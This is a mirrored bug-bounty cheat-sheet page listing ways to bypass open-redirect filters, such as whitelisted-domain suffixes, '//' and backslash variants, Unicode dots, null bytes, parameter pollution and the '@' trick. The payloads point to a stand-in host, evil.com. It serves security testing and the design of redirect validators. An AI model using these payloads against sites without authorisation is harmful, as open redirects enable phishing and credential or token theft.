mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
1.1 KiB
1.1 KiB
Filter Bypass
- Using a whitelisted domain or keyword
target.com.evil.com
- Using "//" to bypass "http" blacklisted keyword
//evil.com
- Using "https:" to bypass "//" blacklisted keyword
https:evil.com
- Using "//" to bypass "//" blacklisted keyword (Browsers see // as //)
\/\/evil.com/
/\/evil.com/
- Using "%E3%80%82" to bypass "." blacklisted character
/?redir=evil。com
/?redir=evil%E3%80%82com
- Using null byte "%00" to bypass blacklist filter
//evil%00.com
- Using parameter pollution
?next=target.com&next=evil.com
- Using "@" character, browser will redirect to anything after the "@"
target.com@evil.com
target.com%40evil.com
- Creating folder as their domain
http://www.yoursite.com/http://www.theirsite.com/
http://www.yoursite.com/folder/www.folder.com
- Using "?" characted, browser will translate it to "/?"
http://www.yoursite.com?http://www.theirsite.com/
http://www.yoursite.com?folder/www.folder.com
- Host/Split Unicode Normalization
https://evil.c℀.example.com
- Using parsing
http://ⓔⓥⓘⓛ.ⓒⓞⓜ